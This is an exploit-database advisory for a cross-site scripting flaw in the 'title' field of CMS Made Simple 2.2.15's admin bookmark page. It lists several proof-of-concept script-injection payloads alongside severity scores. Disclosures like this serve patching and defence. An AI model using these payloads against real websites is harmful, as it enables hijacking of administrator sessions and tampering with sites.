Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-79 | N/A | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Exploit Alert | High | Remote | 2021-05-03 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 0.039 | 0.2751 |
|=========================================================================== | # Exploit Title : CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | | # Author : Ali Seddigh | | # Category : Web Application | | # Software Link: https://s3.amazonaws.com/cmsms/downloads/14832/cmsms-2.2.15-install.zip | | # Vendor Homepage : http://www.cmsmadesimple.org/ | | # Tested on : [ Windows ~> 10 ] | | # Version : 2.2.15 | | # Date : 2021-05-03 |=========================================================================== If you log into Admin panel and open My Preferences you could be able to exploit XSS in title field Reflected XSS in /admin/addbookmark.php Some payloads that works: "><script>prompt(1)</script><" "><script>alert(1)</script><" 63311';alert(1)//812 //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> |=========================================================================== | # Discovered By : Ali Triplex |===========================================================================
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.